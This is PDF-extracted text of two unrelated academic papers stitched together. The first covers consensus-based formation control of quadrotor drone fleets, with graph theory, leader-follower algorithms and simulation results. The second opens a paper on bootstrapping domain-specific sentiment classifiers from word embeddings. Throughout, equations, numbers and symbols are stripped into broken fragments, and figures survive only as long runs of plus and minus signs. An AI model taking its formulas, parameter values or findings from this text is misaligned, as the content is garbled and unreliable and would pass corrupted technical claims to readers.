edge is directional and the diagram is a directed graph. undirected graph can be considered as a special case of directed graph. directed graph is more practical as it takes the one-way flow of information into consideration. adjacency matrix uses algebra matrix to describe the location relationship between the nodes, note adjacency matrix as [ ] n n ij a a r    , thereinto , , other i j ij v v e a     the neighbor nodes for the node i is the set ( ) i n v g , namely { : ( , ) } i j i j n v v v v e   in undirected graph, the degree of any node i is defined as the number of neighbor nodes of node i; in directed graph, the node degree is equal to the sum of the inward degree and the outward degree of node i, namely, ( ) ( ) ( ) i in i out i d v d v d v  the inward degree and the outward degree of node i v are respectively defined as: ( ) , ( ) n n in i ji out i ij j j d v a d v a      the undirected graph/directed graph laplacian matrix adopts the following definition: , , n ik kij ij a i j l a i j         b. group system information consistency assuming that number of flight vehicles in the formation is n, we use ( , ) n n n g v  to indicate the communication topology among various vehicles, in which ={ , } n v n,, is the node set, n n n v v   is the edge set. the matrix [ ] n n n ij a a r    and [ ] n n n ij l l r    are respectively the adjacency matrix and asymmetric laplacian of graph n g . consider a simple single integrator system: , , , i i u i n     in the equation above, m i r  and m i u r are respectively the information state and control input of vehile i. the common continuous time consistency algorithm of first-order integrator system is:    , , , n i ij i j j u a t i n         the above two equations are rewritten into matrix form as below:  n ml t i        theorem [ ] : under the condition of fixed time invariant communication topology, if and only if directed communication topology is a bunch of directed spanning tree, the flight vehicles formation can gradually reach agreement; under the condition of time-varying communication topology, the conditions for flight vehicles international conference on sensor network and computer engineering (icsnce ) formation reaching agreement are the existence of an infinite number of uniformly bounded adjacency periods which enables the set of the directed communication topology of the flight vehicles formation to exist in all these periods and contain a bunch of directed spanning tree. when considering the maneuver of the flight vehicles formation, we indicate the information equation with a second order integral dynamic system. the second-order dynamic systems integrator algorithm is an extension of the first-order integrator power system consistency algorithm. the existence of a tufted spanning tree in the directed graph is conditions of second-order dynamic systems integrator agreement necessary rather than sufficient conditions. taking the following second order integrator power system as an example: i i   i u   m i r  is the state of system information; m i r  is system information state derivative; m i u r is the system information input control of member i. assuming that the same communication topology about the transfer between i  and i  exists among different quadrotors, and also uses  ,n n ng v  to represent, and n a and n l respectively represent the adjacency matrix and asymmetric laplace matrix. a basic second-order dynamic systems integrator consistency algorithm is as follows:        [ ] n i ij i j i j j u a t t             , , ,i n  .for any time t is a positive number. if i  and i  respectively signify the position and speed of vehicle i for all ( ) i  and ( ) i  , through operation type ( ), when ,t   i j    and i j    , the formation may reach an agreement at this time. if [ ] , t t t t n      [ ] , t t t t n      the equation above can be rewritten as:  ( ) mt i                      while ( ) ( ) ( ) ( ) n n n n n i t l t t l t          . theorem : algorithms ( ) asymptotically may reach consistent if and only if there are only two zero eigenvalues in  , and other nonzero eigenvalues are all negative real part, particularly for large enough t, ( ) ( )+ ( ) ( ) ( ) n n n i i i i i i i i i a i i t p t p t p           , thereinto t [ ] n p p p p , t n p  , t n p l .relevant attests for the theorem refers to the literature [ ]. iii. system modeling and design of quadrotors formation quadrotor is a typical underactuated system which has four input and six output. they are usually divided into “x” type and“+ ”type. quadrotor realizes pitch, yaw and roll motion of the plane by controlling the four motor and the speed of the propeller. the definition of inertia coordinate system  i oxyz and body coordinate system  b oxyz , as shown in fig. . x z y q z x y o f b l r  figure . the definition of quadrotor’s position coordinate system international conference on sensor network and computer engineering (icsnce ) , v r  is the position and velocity of the quadrotor under the inertial coordinates, and r is the varying attitude angular velocity of the vehicle under coordinate system. r   is referred to as the rotation matrix from the coordinate system to the inertial coordinate system, c c c s s s c s s c s c c s c c s s s s c c s s s s c c c                                               sins   and  cosc   represent the sine and cosine.   t r     is the euler angle of quadrotor in the vehicle coordinate system. [ ] t z e is the unit vector of z shaft. z n e  is column of attitude matrix. m is the weight of the quadrotor. j diag j j j r   = is the system rotation inertia matrix. g is the acceleration of gravity. t is the total lift of the four propellers that drives the quadrotors’ position change.   t    respectively represent the control matrix of roll, pitch and yaw direction. it is assumed that the center of the aircraft is the origin of the coordinate system. driving motor has no installation angle error. excepting the rotor rotation, the rest of a quadrotor is supposed as rigid. taking the north, east, and the ground coordinate system as the inertial coordinate system, this paper adopts the system model in the literature [ ]:   z v mv mg n s                       e t r r j j  the quadrotor position control comprises the inner and outer loop control structure, in which the inner ring controls posture and the outer one controls position. the controller can be seen in literature [ ]. the main concern here is the formation control algorithm. the formation controller receives state information of itself and the other members of the formation through its own sensors and the wireless communication network, puts out the respective expected position and posture to position controller, and drives actuator to perform formation task, as shown in fig. . the key study is the design of formation controller based on second order integrator dynamic model. position controller attitude controller formation controller dynamics of four rotor uav expected attitude position and speed attitude and angular velocity moment lift expected position expected orientation uav i position controller attitude controller formation controller dynamics of four rotor uav expected attitude position and speed attitude and angular velocity moment lift expected position expected orientation uav j state interaction figure . structure of the formation control system if the formation size is n, according to the information interaction relationship between quadrotors, the quadrotors formation can be modeled as a directed graph. i is the node i v in the directed graph, information flowing from i to j is marked as edge , , ( , , , ) ij e i j n  . number is specified as the pilot and the rest are followers. in formation control layer, we can see each of the quadrotor as a particle in three-dimensional space, and the quadrotors system meet the type ( ). ( ) n i t r  and ( ) ( , , )n i t r n   represent position and speed information of quadrotor i. ( ) n i u t r is the corresponding input control. assuming that the pilot only broadcast its own information r  and r  , the rest followers are able to receive state information from the pilot. the formation topology structure is shown in fig. . regardless of the pilot, the topological relationship between followers can be arbitrary directed graph. international conference on sensor network and computer engineering (icsnce ) … n r  figure . communication topology graph in the process of formation, communication topology remains unchanged and maintains fixed formation. for the convenience of analysis, we consider the simple case of one dimension, the analysis of the three dimensional space can be obtained through the kronecker product. the center of the formation is defined as c v , and its coordinate is ( , , ) c c c c r x y z . cv is the consistent balance point for consistency algorithm. if there is a leading vehicle, c v is the position of the leader, and when without a leader it is the geometric center. we adopt relative position vector to describe the formation and define the relative position deviation as * * * * ( , , ) t i i i i r x y z . the spatial location relations are shown in fig. . for the condition of the existence of a pilot, the following consistency algorithm is shown as:               * * * d d i l i i ix x n ij i i j j ix jx j u t v x x x v v x x x x v v                          d x and d x x are respectively the information of the pilot’s position and speed.  is the adjacency relation between followers and the pilot. when a follower i can receive the pilot's state information,   ,otherwise   . here we take   . in this algorithm, the followers also need to obtain the second order derivative information about the pilot status, namely the pilot input control. i r d r j r * i r * j r * * i j r r  x z y figure . the position relationship among formation members theorem : if i  is the i characteristic values of n l , and i i      ,   . when all of the n  nonzero eigenvalues of n l are all negative real part if   ,otherwise,         re im max im cos arctan re i i i and i i i v                 therefore in the consistency of the algorithm ( ), when t  , then *( ) d i i x x x  and d ix x v v , , , ,i n  . when t  , algorithm ( ) will ensure *d i i x x x  and d ix x v v  . at this time the formation reaches consistency and generates the specified array. on the stabilization issue of the formation, each quadrotor must agree on the formation center. the center’s position is changeless and the velocity is zero, which means d x v  . through the consistency algorithm, different formation can be designed only by changing the communication topology g and setting up different location deviation * i r . international conference on sensor network and computer engineering (icsnce ) iv. experiment simulation a. parameter settings quadrotor control adopts traditional pid control algorithm. the inner ring control is for posture stability while the outer ring for position control. the experiment assumes that the underlying controller is well performed. on that basis, the formation control module is inserted. the formation number is n = , and there are no obstacles in the flight space, the system mass m = . kg, and the moment of inertia are . . x y z j j kg m j kg m    , the communication topological structure is shown in fig. . the specific parameter is set as ,    . quadrotor numbers is the pilot and the remaining four are the followers. the deviation to describe the relative position of the expectation formation is set to * * * * * . . [ ] . . r r r r r            figure . quadrotor’s communication topology in the simulation experiments this experiment sets two circumstances: formation rally and formation maneuvers. case : the pilot hovers in the air waiting for formation in the designated position. at this point, the setting d v  ; case : the pilot make circular motion at fixed height in the air, while the other four quadrotors track the movement of the pilot and ultimately form a set mobile fleet. the trajectory of the pilot is as follows: cos sin d d d v t y t z        the simulation step is . s, and the simulation time is s. b. simulation results case : quadrotors formations are assembled as shown in fig. . at the beginning of the simulation, the pilot waits at a position in the air while the other four take off from the ground. each quadrotor maneuvers in the pre-selected direction and after a period of time they construct a diamond formation with the pilot as the center. that verifies the effectiveness of algorithm ( ) in rallying the formation. figure . simulation curve of the generation of the quadrotors formation case : quadrotors formation maneuvers as shown in fig. . at the beginning of the simulation, the pilot do circular motion in the air, the followers in different positions on the ground, take off and receive information about the pilot status. in algorithm ( ), each follower will apply the second order derivative of the pilot’s status information, which means the followers know the pilot’s control input at any time. the follower quadrotors do not simply gather towards the pilot, but do circular motion in the plane direction like the pilot. as a result they rise in a spiral and eventually converge to a stabile formation with the pilot as the center. international conference on sensor network and computer engineering (icsnce ) figure . simulation curve of quadrotor formation maneuver fig. and fig. show more clearly the rule of change in position and speed of each members of the formation from the x direction and z direction. from fig. (a), we can see the quadrotors rapidly gather to the pilot (the black curve) after they take off. at t s the followers get close to the specified location and they are able to track the trajectory change of the pilot. from fig. (b), we can see after t s with consistency algorithm, the following quadrotors is consistent with the pilot’s speed and are able to track speed changes of the pilot. fig. describes quadrotors’ position and speed change curve in z direction. the changing rule is roughly the same to that in the x direction, so we do not talk about it in detail. under the guidance of second order coherence algorithm, quadrotors formation converges at a higher speed and realizes better synchronization. (a) position change in x-direction (b) velocity change in x-direction figure . curve of each quadrotor’s position and velocity change in x-direction (a) position change in z-direction (b) velocity change in z-direction figure . curve of each quadrotor’s positon and velocity change in z-direction v. conclusion according to quadrotor aircraft fleet formation problem, the quadrotor is described as a second order integrator dynamics model and a method called distributed formation control method is designed based on graph theory and leading to follow method. the research is mainly focused on the second-order coherence algorithm in the application of the quadrotor aircraft fleet formation. in formation control layer, the quadrotor is regard as a particle in three-dimensional space, and by using the consistent algorithm with leader, the control requirements of marshalling and marshalling maneuver are realized; finally, the validity of the consistency marshalling algorithm is verified by matlab simulation. references [ ] wang x.k., li x., zheng z.q., survey of develop- ments on multi-agent formation control related problems[j]. control and decision, , ( ): - . [ ] ren w., beard r.w., distributed consensus in multi-vehicle cooperative control theory and applications[m]. new york: spring, . [ ] wu z.p., guan z.h.,wu x.y., consensus based formation control of multi-rotor system[j]. control and decision, , ( ): - . international conference on sensor network and computer engineering (icsnce ) [ ] matthew t, nathan m, vijay k. trajectory design and control for aggressive formation flight with quadrotors [j]. auton robot, , : - . [ ] xing g.s., du c.y., zong q., chen h.y., sun h.x., consensus-based distributed motion planning for autonomous formation of miniature quadrotor groups[j]. control and decision, , ( ): - . [ ] olfati-saber r, fax j a, murray r m. consensus and cooperation in networked multi-agent system[c]. proc of the ieee. : - . [ ] wei r, ella a, distributed multi-vehicle coordinated control via local information exchange[j].robust nonlinear control. , : - . [ ] li g.c., wang l., wang z.l., xu d.x., trajectory tracking control of quad-rotor uav based on quaternion[j]. journal of applied sciences. , ( ): - . bootstrap domain-specific sentiment classifiers from unlabeled corpora andrius mudinas, dell zhang, and mark levene department of computer science and information systems birkbeck, university of london london wc e hx, uk andrius@dcs.bbk.ac.uk, dell.z@ieee.org, mark@dcs.bbk.ac.uk abstract there is often the need to perform sentiment classification in a particular domain where no labeled document is available. although we could make use of a general-purpose off-the- shelf sentiment classifier or a pre-built one for a different domain, the effectiveness would be inferior. in this paper, we explore the possibil- ity of building domain-specific sentiment clas- sifiers w ith u nlabeled d ocuments o nly. our investigation indicates that in the word em- beddings learned from the unlabeled corpus of a given domain, the distributed word rep- resentations (vectors) for opposite sentiments form distinct clusters, though those clusters are not transferable across domains. ex- ploiting such a clustering structure, we are able to utilize machine learning algorithms to induce a quality domain-specific senti- ment lexicon from just a few typical senti- ment words (“seeds”). an important finding is that simple linear model based supervised learning algorithms (such as linear svm) can actually work better than more sophis- ticated semi-supervised/transductive learning algorithms which represent the state-of-the- art technique for sentiment lexicon induction. the induced lexicon could be applied directly in a lexicon-based method for sentiment clas- sification, b ut a h igher p erformance c ould be achieved through a two-phase bootstrapping method which uses the induced lexicon to as- sign positive/negative sentiment scores to un- labeled documents first, a nd t hen u ses those documents found to have clear sentiment sig- nals as pseudo-labeled examples to train a document sentiment classifier v ia supervised learning algorithms (such as lstm). on sev- eral benchmark datasets for document senti- ment classification, our end-to-end pipelined approach which is overall unsupervised (ex- cept for a tiny set of seed words) outper- forms existing unsupervised approaches and achieves an accuracy comparable to that of fully supervised approaches. introduction sentiment analysis (liu, ) is a popular research topic which has a wide range of applications, such as summarizing customer reviews, monitoring social media, and predicting stock market trends (bollen et al., ). a basic task in sentiment analysis is to classify the sentiment polarity of a given piece of text (document), i.e., whether the opinion expressed in the text is positive or negative (pang et al., ), which is the focus of this paper. there are many different approaches to senti- ment classification in the natural language process- ing (nlp) literature — from simple lexicon-based methods (ding et al., ; thelwall et al., ; thelwall et al., ) to learning-based approaches (pang and lee, ; turney, ; jo and oh, ; argamon et al., ; lin and he, ), and also hybrid methods in between (mudinas et al., ; zhang et al., ). no matter which ap- proach is taken, a sentiment classifier built for its target domain would work well only within that spe- cific domain, but suffer a serious performance loss once the domain boundary is crossed. the same word could drastically change its sentiment polarity (and/or strength) if it is used in a different domain. for example, being “small” is likely to be negative transactions of the association for computational linguistics, vol. , pp. – , . action editor: diana mccarthy. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. for a hotel room but positive for a digital camcorder, being “unexpected” may be a good thing for the end- ing of a movie but not for the engine of a car, and we will probably enjoy “interesting” books but not nec- essarily “interesting” food. here, the domain could be defined not by the topic of the documents but by the style of writing. for example, the meanings of words like “gay” and “terrific” would depend on whether the text was written in a historical era or modern times. when we need to perform sentiment classifica- tion in a new domain unseen before, there are usu- ally neither labeled dictionary available to employ lexicon-based sentiment classifiers nor labeled cor- pus available to train learning-based sentiment clas- sifiers. it is, of course, possible to resort to a general- purpose off-the-shelf sentiment classifier, or a pre- built one for a different domain. however, the ef- fectiveness would often be unsatisfactory because of the reasons mentioned above. there have been some studies on domain adaptation or transfer learn- ing for sentiment classification (blitzer et al., ; tan et al., ; pan et al., ; glorot et al., ; yoshida et al., ; bollegala et al., ; xia et al., ; yang and eisenstein, ), but they still require a large amount of labeled training data from a fairly similar source domain, which is not always feasible. those algorithms also tend to be computational-expensive and time-consuming (mo- hammad and turney, ; fast et al., ). in this paper, we propose an end-to-end pipelined nearly-unsupervised approach to domain-specific sentiment classification of documents for a new domain based on distributed word representations (vectors). as shown in fig. , the proposed approach consists of three main stages (components): ( ) domain-specific sentiment word embedding, ( ) domain-specific sentiment lexicon induction, ( ) domain-specific sentiment classification of doc- uments. briefly speaking, given a large unlabeled corpus for a new domain, we would first set up the vector space for that domain via word embedding, then induce a sentiment lexicon in the discovered vec- tor space from a very small set of seed words as well as a general-purpose lexicon, and finally exploit the induced lexicon in a lexicon-based document sentiment classifier to bootstrap a more effective learning-based document sentiment classifier for that domain. the second stage of our approach out- performs the state-of-the-art unsupervised method for sentiment lexicon induction (hamilton et al., ), which is the most closely related work (see section ). the key to the superior performance of our method compared with theirs is the insight gained from our first stage that positive and neg- ative sentiment words are largely clustered in the domain-specific vector space but these two clus- ters have a non-negligible overlap, therefore semi- supervised/transductive learning algorithms could be easily misled by the examples in the overlap and would actually not work as well as simple super- vised classification algorithms. overall, the docu- ment sentiment classifier resulting from our nearly- unsupervised approach does not require any labeled document to be trained, and it can outperform the state-of-the-art unsupervised method for document sentiment classification (eisenstein, ). the source code for our implemented system and the datasets for our experiments are open to the research community . the rest of this paper is organized as follows. in section , we review previous studies on this topic. in sections to , we describe the three main stages of our approach respectively. in section , we draw conclusions and discuss future work. related work most of the early sentiment analysis systems took lexicon-based approaches to document sentiment classification which rely on pre-compiled sentiment lexicons (owsley et al., ). various methods have been proposed to automatically produce such sentiment lexicons (hu and liu, ; ding et al., ). later, the focus of research shifted to learning-based approaches (pang et al., ; pang and lee, ), as supervised learning algorithms usually deliver a much higher accuracy in senti- ment classification than pure lexicon-based meth- ods. however, lexicons have not completely lost their attractiveness: they are usually easier to un- derstand and to maintain by non-experts, and they can also be integrated into learning-based sentiment classifiers (mudinas et al., ; eisenstein, ). https://goo.gl/ k pbe unlabeled training documents word embeddings sentiment lexicon pseudo-labeled training documents probabilistic word classifier sentiment seeds lexicon-based sentiment classifier learning-based sentiment classifier unlabeled test documents classified test documents figure : our nearly-unsupervised approach to domain-specific sentiment classification. the lexicon-based sentiment classifier used in our experiments is a publicly-available system called psenti (mudinas et al., ). in addition to a customizable sentiment lexicon, it also uses shallow nlp techniques like part-of-speech (pos) tagging and the detection of sentiment inverters and other modifiers (intensifying and diminishing adverbs). the introduction of modern word embedding techniques like word vec (mikolov et al., ) and glove (pennington et al., ) have opened the possibility of new sentiment analysis methods. given a large unlabeled corpus, such techniques can learn from word co-occurrence information and pro- duce a vector space of hundreds of dimensions, with each word being assigned a corresponding vector. the resulting vector space helps in understanding the semantic relationships between words and al- lows grouping of words based on their linguistic similarities. recently rothe et al. ( ) proposed the densifier method that can reduce the dimen- sionality of word embeddings without losing seman- tic information and explored its application in vari- ous domains. for the semeval- task (rosenthal et al., ), densifier performed slightly worse compared to word vec, though its training time was shorter by a factor of . in fact, previous studies such as (rothe et al., ; cliche, ) suggest that word vec usually provides the best word em- beddings for sentiment analysis tasks. in their recent work, hamilton et al. ( ) https://goo.gl/pj xaq demonstrated that by starting from a small set of seed words and conducting label propagation over the lexical graph derived from the pairwise prox- imities of word embeddings, they could induce a domain-specific sentiment lexicon comparable to a hand-curated one. intuitively, the success of their method named sentprop requires a relatively clear separation between sentiment words of opposite po- larity in the vector space which, as we will show later, is not very realistic. moreover, they have fo- cused on the induction of sentiment lexicons alone, while we are trying to design an end-to-end pipeline that can turn unlabeled documents in a new do- main directly to their sentiment classifications, with domain-specific sentiment lexicon induction as a key component. recent advances in deep learning (lecun et al., ) has elevated sentiment analysis to new perfor- mance levels (kim, ; dai and le, ; hong and fang, ). as reported by dai and le ( ), the long short-term memory (lstm) (hochreiter and schmidhuber, ) recurrent neural network (rnn) can reach or surpass the performance lev- els of all previous baselines for sentiment classifi- cation of documents. one of the many appeals of ltsm is that it can connect previous information to the current context and allow seamless integration of pre-trained word embeddings as the first (projec- tion) layer of the neural network. moreover, rad- ford et al. ( ) discovered the “sentiment unit”, the single unit which can learn the perfect represen- tation of sentiment, in a multiplicative lstm with units, despite the fact that the lstm was only trained for a completely different purpose — to pre- dict the next character in the text of amazon re- views. our results are in line with those findings and confirmed the superiority of lstm in building document-level sentiment classifiers. zhang et al. ( ) tried to address the low re- call problem of lexicon-based methods for twitter sentiment classification via training a learning-based sentiment classifier using the noisy labels generated by a lexicon-based sentiment classifier (ding et al., ). although the basic idea of their work is similar to what we do in the third stage of our ap- proach (see section ), there exist several notable differences. first, they adopted a single general- purpose sentiment lexicon provided by ding et al. ( ) and used it for all domains, while we would induce a different lexicon for each different domain. consequently, their method could have a relatively large variance in the document sentiment classifica- tion performance because of the domain mismatch (e.g., f = . for the “tangled” tweets and f = . for the “obama” tweets), whereas our approach would perform quite consistently over dif- ferent domains. second, they would need to strip out all the previously-known opinion words in their single general-purpose sentiment lexicon from the training documents in order to prevent the training bias and force their document sentiment classifier to exploit domain-specific features, but doing this would obviously lose the very valuable sentiment signals carried by those opinion words. in contrast, we would be able to utilize all terms in the training documents, including those opinion words that ap- peared in our automatically induced domain-specific lexicons, as features, when building our document sentiment classifiers. third, they designed their method specifically for twitter sentiment classifica- tion, while our approach would work for not only short texts such as tweets (see section . ) but also long texts such as customer reviews (see sec- tion . ). fourth, they had to use an intermediate step to identify additional opinionated tweets (ac- cording to the opinion indicators extracted through the χ test on the results of their lexicon-based sen- timent classifier) in order to handle the neutral class, but we would not require that time-consuming step as we would use the calibrated probabilistic outputs of our document sentiment classifier to detect the neutral class (see section . ). domain-specific sentiment word embedding our approach to domain-specific document-level sentiment classification is built on top of word em- beddings — distributed word representations (vec- tors) that could be learned from an unlabeled corpus to encode the semantic similarities between words (goldberg, ). in this section, we investigate how the embed- dings of sentiment words for a particular domain would look like in the domain-specific vector space. to ensure a fair comparison with the state-of-the- art sentiment lexicon induction technique sentprop (hamilton et al., ) later in section , we adopt the same publicly-available pre-trained word em- beddings for the following three domains together with the corresponding sets of sentiment words (i.e., sentiment lexicons). • standard-english. we use the the google news word embeddings and the ‘general inquirer’ lex- icon (stone et al., ) with the sentiment polar- ity scores collected by warriner et al. ( ). • twitter. we use the word embeddings constructed by rothe et al. ( ) and the sentiment lexicon from the semeval- task e (rosenthal et al., ). • finance. we use the word embeddings learned us- ing an svd-based method (manning et al., ) from a collection of “ -k” financial reports (lee et al., ) and the finance sentiment lexicon hand-crafted by hamilton et al. ( ). note that the above three sentiment lexicons would be used for both the inspection of sentiment word distributions in this section and the evaluation of sentiment lexicon induction later in the next sec- tion. furthermore, to facilitate a fair compari- son with the state-of-the-art unsupervised document sentiment classification technique problex-dcm (eisenstein, ) later in section , we also adopt the following two document collections which they have used. https://goo.gl/bfky n https://goo.gl/ r l https://goo.gl/ ntr v https://goo.gl/qr f • imdb. we use k movie reviews in english from imdb (maas et al., ) with k labeled training documents. • amazon. we use about k product reviews in english across four product categories from ama- zon (blitzer et al., ; mcauley and leskovec, ) with k labeled training documents. the word embeddings for the above two domains were trained by us on the respective corpora us- ing word vec (mikolov et al., ) which employs a two-layer neural network and is by far the most widely used word embedding technique. specifi- cally, we ran word vec with skip-gram of a five- word window to construct word vectors of di- mensions, as recommended by previous studies . the sentiment lexicon made by liu ( ) is consis- tently one of the best for analyzing reviews (ribeiro et al., ), so it is used for both of those domains. drawing an analogy to the well-known cluster hy- pothesis in information retrieval (ir) (manning et al., ), here we put forward the cluster hypothe- sis for sentiment analysis: words in the same cluster behave similarly with respect to sentiment polarity in a specific domain. that is to say, we expect pos- itive and negative sentiment words to form distinct clusters, given that they have been represented in an appropriate vector space. to verify this hypothesis, it would be useful to visualize the high-dimensional sentiment word vectors in a d plane. we have tried a number of dimensionality reduction tech- niques including the t-distributed stochastic neigh- bor embedding (t-sne) (van der maaten and hin- ton, ), but found that simply using the clas- sic principle component analysis (pca) (bishop, ) works very well for this purpose. we have found that in general, the above cluster hypothesis holds for word embeddings within a spe- cific domain. fig. a shows that in the standard- english domain, the sentiment words with opposite polarities would form two distinct clusters. how- ever, it can also be seen that those two clusters would overlap with each other. that is because each word carries not only a sentiment value but also its linguis- tic and semantic information. zooming into one of the word vector space regions (fig. b) can help us understand why sentiment words with different po- https://goo.gl/syadej − − + + − − − − + + + + − − − − − + − − + − − − + − + − + − − − + + + + − + − − − + + + + − + + − + + − + − − + −− − + − − − + + − − + + − + − + − + − + − + + + − + + − + − + − − + − − − + + − − − − − + − − − − − + − − − + − + + − + + + + − + + − + − − − − − + + + + + + − − − − + − − − + − − − − + − + − −− − + + − + + + − + − + − − − − + − − + + + + − − + − + − − − + + + + − − − − − + − + + + − − + − − − − − − + + − − + − − + + − − −+ + −− − + − − + − − + − − + − − + + + + − − − − − − − + − −+ − − − − −+ − − − + − + − + + + + + + − − − − − + − − − − + + + − − + − + + − − − + + + − − + + + − − − − − + + + + + − + + − − − + + − −+ − − − − + − − + − + − − + − + − − + − − − − − − + − − − − − + − − − − − − − − − + − + −+ + − − − − + − − + + + − − + − − + + + − − − + − − + − + + + + − + + + + + − − − − + − + + + − −+ + − − − + − + − − − + + − + − + + + − − − − − − + − + − − − − − + − − − − − − − + − + − + + − −− − − − − − − + − + − + − − + + − − − − − + − − + + + − + + − − − + + − + − − − − − − − − − − − − − − − + − − + − + − + − + + + − − − − − − + − − − − − − − − − − − + − − − + + − − − + − − − −+ − + + + − − − + −+ − − − + − + − − + − + − − − − −+ + − + + − + − − − + − − + + − + + − − − − − − + − − − − + + − + + + − − + ++ + − + + − − + + − + + − − − + + − + − − − + + − − − − + − + − − − + − + − + − − − + + − − + − + + − + + − − + + + + − + − + − − − + − + − + − − − − − + + + + − + − + − + + − − + + − + + − − + − − + − − − − ++ − − + − − − − + − + + + − + + − + − + + + − − − − − − + − − − − − − − − − − + − + − + − − + − − + − − + + − + − + − − + − −− − + − + − − + − + − − + − + − − − + − − + − − − − − + + + + − + − − − + − − + − − + −− − − − − − − − + − + − − − − − − − − + − + − + + + − + − − − + + − − − − − + − + − + + − − − − − − − − + + − − − + − − − + − − − + − + − + − − − − − − + + + − + − − + − + + + − + − − − + + + − + − − + − − − − + + − − + − − − − − − − + − + − − − + − + + − + − − − − + − − − − + − + + − + + + − + − − − − − − − + − + + + − + + + − − + − − − − + − − − − + − + − − − + − + − + + − + + − + − − − − + + − − − − + − + − − − + + + − − − + + − − + − − − − −+ − + + − − + − − − − − − − − − − + − − − + − − + − + − −+ − + − − − − − − − + + + + + + + − + − − − − − + − − + − + − − − + − − + + + − − + − + + − − − − − − − − + − + − − − − − − − + − − + − + + − −+ + −− + − − − − − − − − − − + − + − + − + − − + − − − − − − − + − + + − + − − + + − − − − − − − − + − + − − + − − − − − + + − − + + + − − − + − − + − − + + − + + − − + − + + + + − + − − − − + + − + − − + − + + − − + + − + − − − − + − − + + − − + − − − − + − − − + − + − − + − − −+ + − + − − − + − + − + − − + − − + − − − + −+ + + + − − + − + − + + − + − − − + + − + − + − + − − − − + − + − + + − + − + + − − − + + − + − − − − − − − − + − + − + + + − − − − − + − − + − − − − + − − − − + + + − − − − + − − − − − − − + + − − − − − − − − + − − − − + − + + + − − + − + + + + + − − + − − − − + − + + + − − + − − − + + − + − + − + − − − − − + − − − − − − + + − + + + − − − − − − + − + − + + + + + − − − − − − + − − + + + + + − + − − − + + + − − + + + − − − − + − + − + ++ − ++ − + − − − + − − − − − − − + − − − − − + −− + − − − + − − − − + − − − − − + − − + − + + + + + + − + − − − − − + − −− ++ ++ + − + − − + − − − + + − + − − + − + − − − − − + − + − − − − + + − + − − + − − − − − + + + − − − − + − + + + − − − + + − − + − − + − − + + + + − − + − + − − + + − − + + + − + − − − − − + − − + + − − − + + − − + − + − −+ + + − + − − + − − − + − − + + − − + − + + − − − − −− + − − + − − + − + − − − + − + − + − + + − + − + + + + + + − + − − − + + + − + − − − − + − − − − + − + − + + − + + + − − + − + − − + + + − − + + + + + − + − − − + − − + − + − + + + + − − − − − − + − + + − − + − − + + − + + − + − − + − + + + − + − − − + − − + + − − − − − − + − − + − − + − + − − − − + + + + + + − − + − − + − + − + − − − − − + − ++ − − + + − − − + + + − − − − − + − + − −+ + − − − − − + − + − − + + + − − + − − + − − + − + − + − + − + − − + + + + + + + − − + − + − − − − + − − + + − − − − + − − + + − − ++ − − − − − + + −− − − + + − + − − + + − − + − + − − − + + − + − − + + − + + − − + + −− − − − + −− − − + + − − − + − − + − + − − + − − − + − − + − + + − − + + − − − − + − − + − − + − + + − − + −− − − − + − − − − − − − − + − + + − + + + + − − − + − − − − − − − − −+ + + − − + − + − − − − − − −+ + −− − −− − + − + − + − − − − − − + − − ++ + + − + − − − + − − + + + − − + − − − − + − − + + + + − − − − − − + − + + − − − + − + − + − − − + − − + + + − + − − − − − − + ++ + − − − + + − + + − − − − − + − − − + − − + − − − − + − − − + + − + + + + − + + + + − − − − − + − + − − + − − − + + − − − − ++ − + − + − − + − − − + − − − − + − − + + + + − − − + + − + − − − + − − + − − + − − + + + −+ − + − + − − − + + + + − − − + + − − − + + −− − + + − − − − + − + − − − + − + + − + − + − + + + −− − − + + + − − + − + − − − − + − − − + − + − − − + − − − (a) the global vector space showing two clusters. (b) a local region of the vector space zoomed in. figure : visualisation of the sentiment words in the standard-english domain. larities could be grouped together: ‘hail’, ‘stormy’ and ‘sunny’ are linguistically similar as they all de- scribe weather conditions, yet they convey very dif- ferent sentiment values. moreover, as described by (plutchik, ), sentiment could be grouped into multiple dimensions such as joy–sadness, anger– fear, trust–disgust and anticipation–surprise. putting that aside, certain sentiment words can be classified sometimes as positive and sometimes as negative, depending on the context. these reasons lead to the phenomenon that many sentiment words are located in the overlapping noisy region between two clusters in the domain-specific vector space. on visual inspection of the finance (fig. a) sen- timent words and imdb (fig. a) sentiment words in their respective vector spaces, we can see that pos- itive and negative words form distinct clusters which are largely separable. however, if we consider fi- nance sentiment words in the imdb vector space (see fig. b), positive and negative words would be mixed together and could not be separated easily. one may be surprised that positive and negative sentiment words form their respective clusters, be- cause most of the time they could be used in ex- − − + − + − + − − +− − + − − + − − − − − + − − + − + − − − − − + + − + − − − − − + − − − − − − + + − − − − + − + + − + −− − − − + − + + − − − + + − − + + + − + − + − − − − + + + − + − −− − − − − − +− + − − − − − − + − − − +− − − − + − + − + − + − + − + − − + − + − − − − − − + − − + − − − − − − − − − + − − − + − + − + −+ − − + − − − − + + + − − − − − + − − + + − − − −− − − + − − − − − + − − − + + − − + − − − − − − − −− − − − − − + − − − − − − − + − − − − − − − + − + − − − + − + − − − − + − − + − − + + + + − − − − − − − − − + − − + − − + − − − − + + + + − − + − − − − − − − − − − + − − + − − − − − + − + − + − +− − − − − − − − − − − − + −− + + + − − + − + − − − − − − − + + − − − + − + − − − + − + + − − − + − − + − − +− + − − − − − − + − − − − − − − − − + − − ++ + − − − + − − + − +− − − − − − − − (a) in the finance (same domain) vector space. −+ − − + − − + − − − + − − − − + − + − − − + − − + − − + + − − − + −− − −− − − − − + − − + + − − − − − − − − − −− + − − + + −+ − + − + − − + − − − − − − − + − − − − − − − − − − + + − −− − − − + − − + − + − − + − + − − − − − − − − − − − + + − − + + − − + + − − − − − − − + − + − − − − −+ − + − − − − + − +− −+ + − − − + − +− − − + − − − + − − + − − + − + − + − − − − − + + − − + − − + −− − − + − − − − + − − − − − −+ + − − − − + − − + − − − − −− − − − −+ + − − + − − − − − − − + + − −+ − − + − − − + − − − − − − −− −−− − + − − + − − − − − + + − − − − + − − − + − − + + − − + − − − + − − − − − + + − − + + − − − + + − + − −− − − − − − − − − − − − − − − +− − − − − − − − − − − − − + − − − − − − − − + − − − − + − − − − − − − − + − − − − − + − − − − − − − + − − − + − − − − − − − − − − − − − − + + + −− − − − − − − + − + + + − − − − − − + + − + − + − − − − − − + − + − − + − − + − + + − + − − − − − + − − − − − − − − − − − − − + − − + + −+ − − − + − − − + − − − − − + − + − + − − − − − + − − − − − − − − −− − − + − − − − 